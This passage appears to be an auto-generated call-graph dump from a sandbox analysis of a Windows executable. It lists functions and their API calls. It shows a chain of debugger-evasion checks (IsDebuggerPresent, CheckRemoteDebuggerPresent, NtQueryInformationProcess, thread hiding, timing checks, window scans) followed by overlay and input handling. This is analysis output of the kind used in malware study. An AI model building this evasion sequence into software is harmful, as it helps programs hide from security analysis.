7ff68b4b9647 20019->20025 20030 7ff68b4b9642 20019->20030 20033 7ff68b4b963b _invalid_parameter_noinfo_noreturn 20019->20033 20020->20017 20021->20012 20023 7ff68b4cad80 free 20022->20023 20023->20018 20029 7ff68b4cad80 free 20024->20029 20027 7ff68b4b968c 20025->20027 20031 7ff68b4b9687 20025->20031 20036 7ff68b4b9680 _invalid_parameter_noinfo_noreturn 20025->20036 20026->20022 20032 7ff68b4b96d1 20027->20032 20038 7ff68b4b96cc 20027->20038 20041 7ff68b4b96c5 _invalid_parameter_noinfo_noreturn 20027->20041 20028->20024 20029->20019 20034 7ff68b4cad80 free 20030->20034 20037 7ff68b4cad80 free 20031->20037 20035 7ff68b4b9716 20032->20035 20039 7ff68b4b9711 20032->20039 20043 7ff68b4b970a _invalid_parameter_noinfo_noreturn 20032->20043 20033->20030 20034->20025 20444 7ff68b4c77d0 20035->20444 20036->20031 20037->20027 20042 7ff68b4cad80 free 20038->20042 20044 7ff68b4cad80 free 20039->20044 20041->20038 20042->20032 20043->20039 20044->20035 20046 7ff68b4c77d0 2 API calls 20047 7ff68b4b9730 20046->20047 20048 7ff68b4c77d0 2 API calls 20047->20048 20049 7ff68b4b973d 20048->20049 20050 7ff68b4c77d0 2 API calls 20049->20050 20051 7ff68b4b974a 20050->20051 20052 7ff68b4c77d0 2 API calls 20051->20052 20053 7ff68b4b9757 20052->20053 20054 7ff68b4c77d0 2 API calls 20053->20054 20055 7ff68b4b9764 20054->20055 20056 7ff68b4c77d0 2 API calls 20055->20056 20057 7ff68b4b9771 20056->20057 20058 7ff68b4c77d0 2 API calls 20057->20058 20059 7ff68b4b977e 20058->20059 20060 7ff68b4c77d0 2 API calls 20059->20060 20061 7ff68b4b978b 20060->20061 20062 7ff68b4c77d0 2 API calls 20061->20062 20063 7ff68b4b9798 20062->20063 20064 7ff68b4c77d0 2 API calls 20063->20064 20065 7ff68b4b97a5 20064->20065 20066 7ff68b4c77d0 2 API calls 20065->20066 20067 7ff68b4b97b2 20066->20067 20068 7ff68b4c77d0 2 API calls 20067->20068 20069 7ff68b4b97bf 20068->20069 20070 7ff68b4c77d0 2 API calls 20069->20070 20071 7ff68b4b97cc 20070->20071 20072 7ff68b4c77d0 2 API calls 20071->20072 20073 7ff68b4b97d9 20072->20073 20074 7ff68b4c77d0 2 API calls 20073->20074 20075 7ff68b4b97e6 20074->20075 20076 7ff68b4c77d0 2 API calls 20075->20076 20077 7ff68b4b97f3 20076->20077 20078 7ff68b4c77d0 2 API calls 20077->20078 20079 7ff68b4b9800 20078->20079 20080 7ff68b4c77d0 2 API calls 20079->20080 20081 7ff68b4b980d 20080->20081 20082 7ff68b4c77d0 2 API calls 20081->20082 20083 7ff68b4b981a 20082->20083 20084 7ff68b4c77d0 2 API calls 20083->20084 20085 7ff68b4b9827 20084->20085 20086 7ff68b4c77d0 2 API calls 20085->20086 20087 7ff68b4b9834 20086->20087 20088 7ff68b4c77d0 2 API calls 20087->20088 20089 7ff68b4b9841 20088->20089 20090 7ff68b4c77d0 2 API calls 20089->20090 20091 7ff68b4b984e 20090->20091 20092 7ff68b4c77d0 2 API calls 20091->20092 20093 7ff68b4b985b 20092->20093 20094 7ff68b4c77d0 2 API calls 20093->20094 20095 7ff68b4b9868 20094->20095 20096 7ff68b4c77d0 2 API calls 20095->20096 20097 7ff68b4b9875 20096->20097 20098 7ff68b4c77d0 2 API calls 20097->20098 20099 7ff68b4b9882 20098->20099 20100 7ff68b4c77d0 2 API calls 20099->20100 20101 7ff68b4b988f 20100->20101 20102 7ff68b4c77d0 2 API calls 20101->20102 20103 7ff68b4b989c 20102->20103 20104 7ff68b4c77d0 2 API calls 20103->20104 20105 7ff68b4b98a9 20104->20105 20106 7ff68b4c77d0 2 API calls 20105->20106 20107 7ff68b4b98b6 20106->20107 20108 7ff68b4c77d0 2 API calls 20107->20108 20109 7ff68b4b98c3 20108->20109 20110 7ff68b4c77d0 2 API calls 20109->20110 20111 7ff68b4b98d0 20110->20111 20112 7ff68b4c77d0 2 API calls 20111->20112 20113 7ff68b4b98dd 20112->20113 20114 7ff68b4c77d0 2 API calls 20113->20114 20115 7ff68b4b98ea 20114->20115 20116 7ff68b4c77d0 2 API calls 20115->20116 20117 7ff68b4b98f7 20116->20117 20118 7ff68b4c77d0 2 API calls 20117->20118 20119 7ff68b4b9904 20118->20119 20120 7ff68b4c77d0 2 API calls 20119->20120 20121 7ff68b4b9911 20120->20121 20122 7ff68b4c77d0 2 API calls 20121->20122 20123 7ff68b4b991e 20122->20123 20124 7ff68b4c77d0 2 API calls 20123->20124 20125 7ff68b4b992b 20124->20125 20126 7ff68b4c77d0 2 API calls 20125->20126 20127 7ff68b4b9938 20126->20127 20128 7ff68b4c77d0 2 API calls 20127->20128 20129 7ff68b4b9945 20128->20129 20130 7ff68b4c77d0 2 API calls 20129->20130 20131 7ff68b4b9952 20130->20131 20132 7ff68b4c77d0 2 API calls 20131->20132 20133 7ff68b4b995f 20132->20133 20134 7ff68b4c77d0 2 API calls 20133->20134 20135 7ff68b4b996c 20134->20135 20136 7ff68b4c77d0 2 API calls 20135->20136 20137 7ff68b4b9979 20136->20137 20138 7ff68b4c77d0 2 API calls 20137->20138 20139 7ff68b4b9986 20138->20139 20140 7ff68b4c77d0 2 API calls 20139->20140 20141 7ff68b4b9993 20140->20141 20142 7ff68b4c77d0 2 API calls 20141->20142 20143 7ff68b4b99a0 20142->20143 20144 7ff68b4c77d0 2 API calls 20143->20144 20145 7ff68b4b99ad 20144->20145 20146 7ff68b4c77d0 2 API calls 20145->20146 20147 7ff68b4b99ba 20146->20147 20148 7ff68b4c77d0 2 API calls 20147->20148 20149 7ff68b4b99c7 20148->20149 20150 7ff68b4c77d0 2 API calls 20149->20150 20151 7ff68b4b99d4 20150->20151 20152 7ff68b4c77d0 2 API calls 20151->20152 20153 7ff68b4b99e1 20152->20153 20154 7ff68b4c77d0 2 API calls 20153->20154 20155 7ff68b4b99ee 20154->20155 20156 7ff68b4c77d0 2 API calls 20155->20156 20157 7ff68b4b99fb 20156->20157 20158 7ff68b4c77d0 2 API calls 20157->20158 20159 7ff68b4b9a08 20158->20159 20160 7ff68b4c77d0 2 API calls 20159->20160 20161 7ff68b4b9a15 20160->20161 20162 7ff68b4c77d0 2 API calls 20161->20162 20163 7ff68b4b9a22 20162->20163 20164 7ff68b4c77d0 2 API calls 20163->20164 20165 7ff68b4b9a2f 20164->20165 20166 7ff68b4c77d0 2 API calls 20165->20166 20167 7ff68b4b9a3c 20166->20167 20168 7ff68b4c77d0 2 API calls 20167->20168 20169 7ff68b4b9a49 20168->20169 20170 7ff68b4c77d0 2 API calls 20169->20170 20171 7ff68b4b9a56 20170->20171 20172 7ff68b4c77d0 2 API calls 20171->20172 20173 7ff68b4b9a63 20172->20173 20174 7ff68b4c77d0 2 API calls 20173->20174 20175 7ff68b4b9a70 20174->20175 20176 7ff68b4c77d0 2 API calls 20175->20176 20177 7ff68b4b9a7d 20176->20177 20178 7ff68b4c77d0 2 API calls 20177->20178 20179 7ff68b4b9a8a 20178->20179 20180 7ff68b4c77d0 2 API calls 20179->20180 20181 7ff68b4b9a97 20180->20181 20182 7ff68b4c77d0 2 API calls 20181->20182 20183 7ff68b4b9aa4 20182->20183 20184 7ff68b4c77d0 2 API calls 20183->20184 20185 7ff68b4b9ab1 20184->20185 20186 7ff68b4c77d0 2 API calls 20185->20186 20187 7ff68b4b9abe 20186->20187 20188 7ff68b4c77d0 2 API calls 20187->20188 20189 7ff68b4b9acb 20188->20189 20190 7ff68b4c77d0 2 API calls 20189->20190 20191 7ff68b4b9ad8 20190->20191 20192 7ff68b4c77d0 2 API calls 20191->20192 20193 7ff68b4b9ae5 20192->20193 20194 7ff68b4c77d0 2 API calls 20193->20194 20195 7ff68b4b9af2 20194->20195 20196 7ff68b4c77d0 2 API calls 20195->20196 20197 7ff68b4b9aff 20196->20197 20198 7ff68b4c77d0 2 API calls 20197->20198 20199 7ff68b4b9b0c 20198->20199 20200 7ff68b4c77d0 2 API calls 20199->20200 20201 7ff68b4b9b19 20200->20201 20202 7ff68b4c77d0 2 API calls 20201->20202 20203 7ff68b4b9b26 20202->20203 20204 7ff68b4ca930 8 API calls 20203->20204 20205 7ff68b4b9b35 20204->20205 20206 7ff68b4b4760 GetModuleHandleA GetProcAddress VirtualProtect VirtualProtect 20205->20206 20207 7ff68b4b4220 15 API calls 20206->20207 20208 7ff68b4b47e4 LoadLibraryA GetProcAddress 20207->20208 20209 7ff68b4b481f QueryPerformanceFrequency QueryPerformanceCounter 20208->20209 20210 7ff68b4b4809 GetCurrentThread NtSetInformationThread 20208->20210 20211 7ff68b4b4840 20209->20211 20210->20209 20211->20211 20212 7ff68b4b4855 QueryPerformanceCounter 20211->20212 20213 7ff68b4b4b81 20212->20213 20216 7ff68b4b488e 20212->20216 20214 7ff68b4ca930 8 API calls 20213->20214 20215 7ff68b4b4b8e 20214->20215 20219 7ff68b4b4220 20215->20219 20217 7ff68b4c89a0 7 API calls 20216->20217 20218 7ff68b4b4b65 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20217->20218 20218->20213 20450 7ff68b4cc0a0 20219->20450 20222 7ff68b4b4260 20223 7ff68b4c8550 6 API calls 20222->20223 20224 7ff68b4b42da 20223->20224 20225 7ff68b4ca930 8 API calls 20224->20225 20226 7ff68b4b42ea 20225->20226 20227 7ff68b4b4bd0 IsDebuggerPresent 20226->20227 20228 7ff68b4b4e91 GetCurrentProcess CheckRemoteDebuggerPresent 20227->20228 20234 7ff68b4b4c0d 20227->20234 20229 7ff68b4b5151 LoadLibraryA GetProcAddress GetCurrentProcess NtQueryInformationProcess 20228->20229 20232 7ff68b4b4eb5 20228->20232 20230 7ff68b4b5441 memset GetCurrentThread GetThreadContext 20229->20230 20238 7ff68b4b519e 20229->20238 20231 7ff68b4b5644 20230->20231 20250 7ff68b4b5476 20230->20250 20452 7ff68b4b4300 20231->20452 20236 7ff68b4c89a0 7 API calls 20232->20236 20235 7ff68b4c89a0 7 API calls 20234->20235 20237 7ff68b4b4e75 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20235->20237 20239 7ff68b4b5135 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20236->20239 20237->20228 20238->20230 20241 7ff68b4c89a0 7 API calls 20238->20241 20239->20229 20240 7ff68b4b57f4 GetCurrentProcess OpenProcessToken 20242 7ff68b4b5811 GetTokenInformation 20240->20242 20243 7ff68b4b5864 20240->20243 20244 7ff68b4b5425 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20241->20244 20246 7ff68b4b5835 20242->20246 20247 7ff68b4b5859 CloseHandle 20242->20247 20489 7ff68b4b4660 20243->20489 20244->20230 20245 7ff68b4c89a0 7 API calls 20249 7ff68b4b5628 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20245->20249 20246->20247 20252 7ff68b4b5a14 CloseHandle 20246->20252 20247->20243 20249->20231 20250->20231 20250->20245 20250->20250 20251 7ff68b4c89a0 7 API calls 20254 7ff68b4b57d8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20251->20254 20265 7ff68b4b5a30 20252->20265 20253 7ff68b4b5bc4 VirtualAlloc 20255 7ff68b4b5be2 memset 20253->20255 20256 7ff68b4b5c27 SetLastError GetLastError 20253->20256 20254->20240 20258 7ff68b4b5c00 20255->20258 20282 7ff68b4b5c42 20256->20282 20257 7ff68b4b5649 20257->20240 20257->20251 20257->20257 20260 7ff68b4b5df4 VirtualFree 20258->20260 20263 7ff68b4b5c16 VirtualFree 20258->20263 20259 7ff68b4b59ed 20262 7ff68b4c89a0 7 API calls 20259->20262 20278 7ff68b4b5e16 20260->20278 20261 7ff68b4c89a0 7 API calls 20267 7ff68b4b5ba8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20261->20267 20270 7ff68b4b59f8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20262->20270 20263->20256 20264 7ff68b4b5fb4 CreateToolhelp32Snapshot 20268 7ff68b4b5fd6 Thread32First 20264->20268 20269 7ff68b4b6077 GetTickCount 20264->20269 20265->20261 20266 7ff68b4b5869 20266->20253 20266->20259 20266->20266 20267->20253 20272 7ff68b4b5ff0 GetCurrentProcessId 20268->20272 20273 7ff68b4b606e CloseHandle 20268->20273 20271 7ff68b4b6090 20269->20271 20270->20252 20271->20271 20274 7ff68b4b60a6 GetTickCount 20271->20274 20276 7ff68b4b605c Thread32Next 20272->20276 20277 7ff68b4b5ffc GetCurrentThreadId 20272->20277 20273->20269 20289 7ff68b4b6265 20274->20289 20292 7ff68b4b60b7 20274->20292 20275 7ff68b4c89a0 7 API calls 20279 7ff68b4b5f98 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20275->20279 20276->20272 20276->20273 20277->20276 20281 7ff68b4b600c OpenThread 20277->20281 20278->20275 20279->20264 20280 7ff68b4c89a0 7 API calls 20283 7ff68b4b5dd8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20280->20283 20281->20276 20284 7ff68b4b6021 LoadLibraryA GetProcAddress 20281->20284 20282->20264 20282->20280 20282->20282 20283->20260 20287 7ff68b4b6053 CloseHandle 20284->20287 20288 7ff68b4b6043 NtSetInformationThread 20284->20288 20285 7ff68b4b6511 GetProcessHeap HeapSetInformation 20286 7ff68b4b66e4 VirtualAlloc 20285->20286 20297 7ff68b4b6533 20285->20297 20290 7ff68b4b68b5 20286->20290 20302 7ff68b4b6706 20286->20302 20287->20276 20288->20287 20289->20285 20295 7ff68b4c89a0 7 API calls 20289->20295 20291 7ff68b4ca930 8 API calls 20290->20291 20294 7ff68b4b68cc 20291->20294 20293 7ff68b4c89a0 7 API calls 20292->20293 20296 7ff68b4b6249 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20293->20296 20294->19532 20299 7ff68b4b64f5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20295->20299 20296->20289 20298 7ff68b4c89a0 7 API calls 20297->20298 20301 7ff68b4b66c8 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20298->20301 20299->20285 20300 7ff68b4c89a0 7 API calls 20303 7ff68b4b6899 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z exit 20300->20303 20301->20286 20302->20300 20303->20290 20305 7ff68b4c87dc 20304->20305 20306 7ff68b4c8804 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 20305->20306 20307 7ff68b4c87f1 20305->20307 20306->20307 20308 7ff68b4c88f4 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 20307->20308 20311 7ff68b4c8890 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20307->20311 20312 7ff68b4c88ae 20307->20312 20314 7ff68b4c8863 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20307->20314 20315 7ff68b4c888d 20307->20315 20309 7ff68b4c8924 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 20308->20309 20310 7ff68b4c435f ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 20308->20310 20309->20310 20317 7ff68b4c8550 20310->20317 20311->20312 20313 7ff68b4c88e4 20312->20313 20316 7ff68b4c88be ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20312->20316 20313->20308 20314->20307 20315->20311 20316->20312 20560 7ff68b4b2230 _Query_perf_frequency _Query_perf_counter 20317->20560 20319 7ff68b4b2230 2 API calls 20322 7ff68b4c8571 20319->20322 20320 7ff68b4c8656 20320->19546 20321 7ff68b4c85fb Sleep 20321->20322 20322->20319 20322->20320 20322->20321 20323 7ff68b4c861a Sleep 20322->20323 20324 7ff68b4c8628 Sleep SleepEx 20322->20324 20323->20322 20324->20320 20327 7ff68b4cafb0 free 20326->20327 20562 7ff68b4813d0 20329->20562 20331 7ff68b4b1172 __stdio_common_vfprintf 20331->19620 20333 7ff68b4be9b0 20332->20333 20334 7ff68b4be8e6 20332->20334 20563 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 20333->20563 20336 7ff68b4be8ec memcpy 20334->20336 20344 7ff68b4be90b 20334->20344 20336->19620 20337 7ff68b4be91c 20340 7ff68b4caf74 std::_Facet_Register 4 API calls 20337->20340 20338 7ff68b4be9b5 20341 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 20338->20341 20339 7ff68b4be95d 20342 7ff68b4be984 memcpy 20339->20342 20345 7ff68b4be932 20340->20345 20346 7ff68b4be9bb 20341->20346 20342->19620 20343 7ff68b4be97c 20347 7ff68b4caf74 std::_Facet_Register 4 API calls 20343->20347 20344->20337 20344->20338 20344->20339 20344->20343 20348 7ff68b4be975 _invalid_parameter_noinfo_noreturn 20345->20348 20349 7ff68b4be937 20345->20349 20347->20349 20348->20343 20349->20342 20351 7ff68b4c89d0 20350->20351 20352 7ff68b4c8a30 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 20351->20352 20354 7ff68b4c8a1d 20351->20354 20352->20354 20355 7ff68b4c8a9d ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 20354->20355 20358 7ff68b4c8a75 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20354->20358 20360 7ff68b4c8a54 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 20354->20360 20359 7ff68b4c8aba 20355->20359 20355->20360 20356 7ff68b4c8b2d ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 20357 7ff68b4c5112 Sleep 20356->20357 20357->19598 20357->19599 20358->20354 20358->20360 20359->20360 20361 7ff68b4c8ac5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 20359->20361 20360->20356 20360->20357 20361->20359 20361->20360 20363 7ff68b4caf8e malloc 20362->20363 20364 7ff68b4caf7f 20363->20364 20365 7ff68b4c6182 _beginthreadex 20363->20365 20364->20363 20366 7ff68b4caf9e 20364->20366 20365->19572 20365->19579 20369 7ff68b4cafa9 20366->20369 20564 7ff68b4cb77c 20366->20564 20368 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 20370 7ff68b4cafaf free 20368->20370 20369->20368 20373 7ff68b4babd3 20372->20373 20374 7ff68b4babc7 exit 20372->20374 20375 7ff68b4bacad 20373->20375 20378 7ff68b4baca1 exit 20373->20378 20374->20373 20568 7ff68b4850f0 20375->20568 20377 7ff68b4bacf3 QueryPerformanceFrequency 20379 7ff68b4bad0f QueryPerformanceCounter 20377->20379 20380 7ff68b4bad24 20377->20380 20378->20375 20379->20380 20582 7ff68b49f050 20380->20582 20385 7ff68b4baefe 20386 7ff68b4baf1c 20385->20386 20388 7ff68b4a2540 3 API calls 20385->20388 20615 7ff68b49ec70 20386->20615 20388->20385 20394 7ff68b49f360 14 API calls 20395 7ff68b4bb013 20394->20395 20396 7ff68b4c36b0 20395->20396 20397 7ff68b4c3700 PeekMessageA 20396->20397 20398 7ff68b4c3740 GetForegroundWindow 20397->20398 20399 7ff68b4c3726 TranslateMessage DispatchMessageA 20397->20399 20400 7ff68b4c3752 GetWindow SetWindowPos 20398->20400 20401 7ff68b4c378d GetClientRect ClientToScreen GetCursorPos GetAsyncKeyState 20398->20401 20399->20398 20400->20401 20403 7ff68b4c381f 20401->20403 20402 7ff68b4c386e SetWindowPos 20402->20403 20403->20402 20404 7ff68b4c38e8 GetClientRect QueryPerformanceCounter GetKeyState GetKeyState GetKeyState 20403->20404 20754 7ff68b4a3750 20403->20754 20405 7ff68b4c39c0 ClientToScreen SetCursorPos 20404->20405 20406 7ff68b4c39ef GetActiveWindow 20404->20406 20405->20406 20408 7ff68b4c3a0b GetCursorPos 20406->20408 20413 7ff68b4c3a2e 20406->20413 20409 7ff68b4c3a19 ScreenToClient 20408->20409 20408->20413 20409->20413 20411 7ff68b4c3a81 GetAsyncKeyState 20412 7ff68b4c3af8 GetAsyncKeyState 20411->20412 20411->20413 20412->20413 20413->20397 20413->20411 20413->20412 20419 7ff68b4c3ab4 rand 20413->20419 20420 7ff68b4cad80 free 20413->20420 20421 7ff68b4c3e2b _invalid_parameter_noinfo_noreturn 20413->20421 20425 7ff68b4c3cfd 20413->20425 20431 7ff68b4a3750 110 API calls 20413->20431 20766 7ff68b4a3910 20413->20766 20772 7ff68b4bdd90 20413->20772 20839 7ff68b4b27c0 20413->20839 20910 7ff68b4becd0 20413->20910 20973 7ff68b4bb2d0 GetAsyncKeyState 20413->20973 21247 7ff68b487070 20413->21247 21265 7ff68b487520 20413->21265 21288 7ff68b4a2e50 20413->21288 20419->20413 20420->20413 21294 7ff68b486800 20425->21294 20427 7ff68b4c3db9 DestroyWindow 20433 7ff68b4ca930 8 API calls 20427->20433 20431->20413 20434 7ff68b4c3e0d 20433->20434 20434->19566 20436 7ff68b4ca939 20435->20436 20437 7ff68b4c6503 20436->20437 20438 7ff68b4cae2c IsProcessorFeaturePresent 20436->20438 20437->19641 20439 7ff68b4cae44 20438->20439 23059 7ff68b4caf00 RtlCaptureContext 20439->23059 20445 7ff68b4b9723 20444->20445 20446 7ff68b4c77e3 20444->20446 20445->20046 20447 7ff68b4c7807 20446->20447 20448 7ff68b4c7828 _invalid_parameter_noinfo_noreturn 20446->20448 20449 7ff68b4cad80 free 20447->20449 20449->20445 20451 7ff68b4b422a ?_Random_device@std@ 20450->20451 20451->20222 20453 7ff68b4be8c0 9 API calls 20452->20453 20454 7ff68b4b4360 20453->20454 20455 7ff68b4be8c0 9 API calls 20454->20455 20456 7ff68b4b4386 20455->20456 20457 7ff68b4be8c0 9 API calls 20456->20457 20458 7ff68b4b43ac 20457->20458 20459 7ff68b4be8c0 9 API calls 20458->20459 20460 7ff68b4b43d2 20459->20460 20461 7ff68b4be8c0 9 API calls 20460->20461 20462 7ff68b4b43f8 20461->20462 20463 7ff68b4be8c0 9 API calls 20462->20463 20464 7ff68b4b441e 20463->20464 20465 7ff68b4be8c0 9 API calls 20464->20465 20466 7ff68b4b4447 20465->20466 20498 7ff68b4be9c0 20466->20498 20468 7ff68b4b4479 20469 7ff68b4b44d7 20468->20469 20472 7ff68b4b44bd FindWindowA 20468->20472 20470 7ff68b4be8c0 9 API calls 20469->20470 20471 7ff68b4b450f 20470->20471 20474 7ff68b4be8c0 9 API calls 20471->20474 20472->20468 20473 7ff68b4b4617 20472->20473 20519 7ff68b4c6710 20473->20519 20475 7ff68b4b4538 20474->20475 20476 7ff68b4be8c0 9 API calls 20475->20476 20478 7ff68b4b4560 20476->20478 20480 7ff68b4be8c0 9 API calls 20478->20480 20482 7ff68b4b4586 20480->20482 20481 7ff68b4ca930 8 API calls 20483 7ff68b4b4636 20481->20483 20484 7ff68b4be9c0 21 API calls 20482->20484 20483->20257 20486 7ff68b4b45b6 20484->20486 20485 7ff68b4b4609 20488 7ff68b4c6710 4 API calls 20485->20488 20486->20485 20487 7ff68b4b45f3 FindWindowA 20486->20487 20487->20485 20487->20486 20488->20473 20490 7ff68b4cc0a0 20489->20490 20491 7ff68b4b4670 GetCurrentProcess K32EnumProcessModules 20490->20491 20492 7ff68b4b46c0 20491->20492 20497 7ff68b4b4730 20491->20497 20493 7ff68b4b46d0 GetCurrentProcess K32GetModuleBaseNameA 20492->20493 20496 7ff68b4b4700 _stricmp 20492->20496 20492->20497 20493->20492 20494 7ff68b4ca930 8 API calls 20495 7ff68b4b4742 20494->20495 20495->20266 20496->20492 20496->20497 20497->20494 20499 7ff68b4beac8 20498->20499 20503 7ff68b4bea0b 20498->20503 20500 7ff68b4ca930 8 API calls 20499->20500 20501 7ff68b4beadc 20500->20501 20501->20468 20504 7ff68b4bea5c 20503->20504 20508 7ff68b4beaf1 20503->20508 20509 7ff68b4bea3d 20503->20509 20514 7ff68b4bea67 20503->20514 20516 7ff68b4beaf6 20503->20516 20510 7ff68b4caf74 std::_Facet_Register 4 API calls 20504->20510 20506 7ff68b4beabd 20543 7ff68b4bec30 20506->20543 20555 7ff68b4b1360 20508->20555 20511 7ff68b4caf74 std::_Facet_Register 4 API calls 20509->20511 20518 7ff68b4bea47 20510->20518 20515 7ff68b4bea42 20511->20515 20514->20506 20526 7ff68b4beb00 20514->20526 20517 7ff68b4bea55 _invalid_parameter_noinfo_noreturn 20515->20517 20515->20518 20558 7ff68b4c66f0 ?_Xlength_error@std@@YAXPEBD 20516->20558 20517->20504 20518->20514 20520 7ff68b4b4624 20519->20520 20522 7ff68b4c6721 20519->20522 20520->20481 20521 7ff68b4bec30 3 API calls 20521->20522 20522->20521 20523 7ff68b4c6756 20522->20523 20524 7ff68b4c6771 _invalid_parameter_noinfo_noreturn 20522->20524 20525 7ff68b4cad80 free 20523->20525 20524->20519 20525->20520 20527 7ff68b4beb2e 20526->20527 20528 7ff68b4bec09 20527->20528 20534 7ff68b4beb44 20527->20534 20559 7ff68b4b1400 ?_Xlength_error@std@@YAXPEBD __std_exception_copy 20528->20559 20529 7ff68b4beb4a 20529->20514 20531 7ff68b4bec0e 20535 7ff68b4b1360 Concurrency::cancel_current_task __std_exception_copy 20531->20535 20532 7ff68b4beb7a 20536 7ff68b4caf74 std::_Facet_Register 4 API calls 20532->20536 20533 7ff68b4bebde memcpy 20533->20514 20534->20529 20534->20531 20534->20532 20534->20533 20537 7ff68b4bebd9 20534->20537 20538 7ff68b4bec14 20535->20538 20539 7ff68b4beb90 20536->20539 20540 7ff68b4caf74 std::_Facet_Register 4 API calls 20537->20540 20541 7ff68b4bebd2 _invalid_parameter_noinfo_noreturn 20539->20541 20542 7ff68b4beb98 20539->20542 20540->20533 20541->20537 20542->20533 20544 7ff68b4bec9e 20543->20544 20545 7ff68b4bec35 20543->20545 20544->20499 20545->20544 20546 7ff68b4becae _invalid_parameter_noinfo_noreturn 20545->20546 20547 7ff68b4cad80 free 20545->20547 20548 7ff68b4beccc 20546->20548 20551 7ff68b4c6710 20546->20551 20547->20545 20548->20499 20549 7ff68b4c675e 20549->20499 20550 7ff68b4bec30 free 20550->20551 20551->20549 20551->20550 20552 7ff68b4c6756 20551->20552 20553 7ff68b4c6771 _invalid_parameter_noinfo_noreturn 20551->20553 20554 7ff68b4cad80 free 20552->20554 20553->20551 20554->20549 20556 7ff68b4b136e Concurrency::cancel_current_task 20555->20556 20557 7ff68b4b137f __std_exception_copy 20556->20557 20557->20516 20559->20531 20561 7ff68b4b2258 20560->20561 20561->20322 20562->20331 20563->20338 20567 7ff68b4cb75c 20564->20567 20566 7ff68b4cb78a _CxxThrowException 20567->20566 20569 7ff68b48510d malloc 20568->20569 20570 7ff68b485107 20568->20570 20571 7ff68b485139 20569->20571 20573 7ff68b485141 20569->20573 20570->20569 20642 7ff68b481450 20571->20642 20578 7ff68b485219 20573->20578 20579 7ff68b4851b1 20573->20579 20574 7ff68b485247 20576 7ff68b485264 20574->20576 20577 7ff68b48524f memcpy 20574->20577 20575 7ff68b4851df 20575->20377 20576->20377 20577->20576 20578->20574 20580 7ff68b493820 3 API calls 20578->20580 20579->20575 20652 7ff68b493820 20579->20652 20580->20574 20715 7ff68b482650 20582->20715 20585 7ff68b49f2fc 20590 7ff68b4ca930 8 API calls 20585->20590 20586 7ff68b49f0ab fseek 20587 7ff68b49f320 fclose 20586->20587 20588 7ff68b49f0c4 ftell 20586->20588 20587->20585 20588->20587 20589 7ff68b49f0d9 fseek 20588->20589 20589->20587 20591 7ff68b49f0ef malloc 20589->20591 20592 7ff68b49f337 malloc 20590->20592 20591->20587 20594 7ff68b49f119 fread 20591->20594 20603 7ff68b4a2540 20592->20603 20595 7ff68b49f135 fclose 20594->20595 20596 7ff68b49f15b fclose 20594->20596 20597 7ff68b49f147 20595->20597 20598 7ff68b49f14d free 20595->20598 20599 7ff68b49f28c 20596->20599 20600 7ff68b49f246 20596->20600 20597->20598 20598->20585 20601 7ff68b49ec70 14 API calls 20599->20601 20725 7ff68b482470 20600->20725 20601->20585 20604 7ff68b4a270e 20603->20604 20607 7ff68b4a2559 20603->20607 20606 7ff68b4a2717 20604->20606 20609 7ff68b4a2894 20604->20609 20610 7ff68b4a290c 20604->20610 20605 7ff68b4a2566 20605->20385 20606->20385 20607->20605 20611 7ff68b4a26e7 memcpy 20607->20611 20608 7ff68b4a28d1 20608->20385 20609->20608 20612 7ff68b4a28d7 memcpy 20609->20612 20613 7ff68b4a294e memcpy 20610->20613 20614 7ff68b4a2948 20610->20614 20611->20605 20612->20608 20613->20614 20614->20385 20616 7ff68b49ec91 malloc 20615->20616 20617 7ff68b49ed13 20615->20617 20619 7ff68b49ecfb 20616->20619 20620 7ff68b49ecca 20616->20620 20622 7ff68b49eda2 20617->20622 20629 7ff68b49ed52 malloc 20617->20629 